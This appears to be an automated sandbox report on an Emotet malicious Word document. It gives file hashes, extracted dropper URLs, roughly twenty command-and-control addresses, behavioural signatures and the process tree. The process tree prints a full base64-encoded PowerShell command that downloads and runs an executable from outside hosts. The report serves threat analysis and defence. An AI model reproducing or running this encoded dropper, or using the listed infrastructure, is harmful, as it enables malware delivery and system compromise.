Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    27s
  • max time network
    22s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    29-07-2020 07:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    85d095862eac57f9468543eca0c155a633dcbe0258599cb769b157125686fd88.doc

  • Size

    169KB

  • MD5

    0df9210729b8327d60535a0814fc8537

  • SHA1

    df7891518edacf404b9b97f26765fdfd275a8d2b

  • SHA256

    85d095862eac57f9468543eca0c155a633dcbe0258599cb769b157125686fd88

  • SHA512

    70fb89116084a4e03ef2d0f915928f63f39b6e604fff0a3744285258d884d5c819b1612598e1ced93b2eb89cb086010eeb81e96f3c16e46f326759b05d95e36e

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://jojofun.co.uk/loges/v7yi_9z9l1_evrg/
exe.dropper

http://macserwis.pl/4995371c/1_m_1dau4ki6f/
exe.dropper

http://kennol.pk/wp-admin/yu7d_oh2g_zmwbfmqo/
exe.dropper

http://lf-hj.cz/a_b3rvy_ua/
exe.dropper

http://www.marisqueiraobarqueiro.pt/modules/2eyu_76wd_82/

Extracted

Family

emotet

C2

76.27.179.47:80

212.51.142.238:8080

189.212.199.126:443

61.19.246.238:443

162.154.38.103:80

91.211.88.52:7080

83.110.223.58:443

124.45.106.173:443

116.203.32.252:8080

109.117.53.230:443

5.196.74.210:8080

75.139.38.211:80

168.235.67.138:7080

176.111.60.55:8080

169.239.182.217:8080

74.208.45.104:8080

31.31.77.83:443

222.214.218.37:4143

37.139.21.175:8080

91.205.215.66:443
rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Executes dropped EXE 2 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\85d095862eac57f9468543eca0c155a633dcbe0258599cb769b157125686fd88.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    PID:1100
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABBAFQAUQBXAEgAaABvAG4APQAnAFMARQBHAE4AVwB5AHQAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAcgBJAFQAWQBQAFIAbwB0AGAAbwBjAGAATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAWgBZAFQATgBXAHAAbwBvACAAPQAgACcANwA0ACcAOwAkAFAATABQAEkARgBzAGYAZgA9ACcAWQBYAFgATgBHAG0AZQBoACcAOwAkAFYARQBSAFUATwBoAHQAagA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWgBZAFQATgBXAHAAbwBvACsAJwAuAGUAeABlACcAOwAkAFoAVwBKAEcAQQBwAGEAZgA9ACcATABCAFUAVABKAG4AdwB6ACcAOwAkAEcAQgBZAEIAQQBzAGkAZwA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAFQALgBXAGUAYgBjAEwASQBFAE4AVAA7ACQASwBBAFgAQgBQAHYAZgBkAD0AJwBoAHQAdABwADoALwAvAGoAbwBqAG8AZgB1AG4ALgBjAG8ALgB1AGsALwBsAG8AZwBlAHMALwB2ADcAeQBpAF8AOQB6ADkAbAAxAF8AZQB2AHIAZwAvACoAaAB0AHQAcAA6AC8ALwBtAGEAYwBzAGUAcgB3AGkAcwAuAHAAbAAvADQAOQA5ADUAMwA3ADEAYwAvADEAXwBtAF8AMQBkAGEAdQA0AGsAaQA2AGYALwAqAGgAdAB0AHAAOgAvAC8AawBlAG4AbgBvAGwALgBwAGsALwB3AHAALQBhAGQAbQBpAG4ALwB5AHUANwBkAF8AbwBoADIAZwBfAHoAbQB3AGIAZgBtAHEAbwAvACoAaAB0AHQAcAA6AC8ALwBsAGYALQBoAGoALgBjAHoALwBhAF8AYgAzAHIAdgB5AF8AdQBhAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbQBhAHIAaQBzAHEAdQBlAGkAcgBhAG8AYgBhAHIAcQB1AGUAaQByAG8ALgBwAHQALwBtAG8AZAB1AGwAZQBzAC8AMgBlAHkAdQBfADcANgB3AGQAXwA4ADIALwAnAC4AIgBzAGAAcABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEwATABMAEQAQwBiAGkAcAA9ACcAVgBRAFoAQgBSAHIAbABuACcAOwBmAG8AcgBlAGEAYwBoACgAJABMAFUATQBDAFYAawBmAGIAIABpAG4AIAAkAEsAQQBYAEIAUAB2AGYAZAApAHsAdAByAHkAewAkAEcAQgBZAEIAQQBzAGkAZwAuACIARABPAHcAbgBsAG8AQQBEAGAARgBgAEkAYABsAEUAIgAoACQATABVAE0AQwBWAGsAZgBiACwAIAAkAFYARQBSAFUATwBoAHQAagApADsAJABJAEkATABaAEgAegB3AHQAPQAnAEsARQBPAEsAUgBoAGIAcwAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFYARQBSAFUATwBoAHQAagApAC4AIgBsAEUAYABOAGcAVABIACIAIAAtAGcAZQAgADMANgA5ADcANwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYQBgAFQAZQAiACgAJABWAEUAUgBVAE8AaAB0AGoAKQA7ACQAVgBVAEkAWQBMAHYAZgBwAD0AJwBLAEsARABIAFYAaQBvAHEAJwA7AGIAcgBlAGEAawA7ACQATABFAEwARwBJAHkAeABsAD0AJwBMAFoAUwBBAFkAdgBvAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQBLAFoARQBCAGsAYQBqAD0AJwBIAFcAUwBCAEMAcQBhAGgAJwA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1040
  • C:\Users\Admin\74.exe
    C:\Users\Admin\74.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Drops file in System32 directory
    PID:1832
    • C:\Windows\SysWOW64\mf\sechost.exe
      "C:\Windows\SysWOW64\mf\sechost.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1616

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1100-2-0x0000000008B80000-0x0000000008B84000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1100-4-0x000000000ACF0000-0x000000000ACF4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1100-5-0x000000000BD70000-0x000000000BD74000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1100-9-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1616-15-0x0000000000330000-0x000000000033C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1832-12-0x0000000000320000-0x000000000032C000-memory.dmp

    Filesize

    48KB

    Download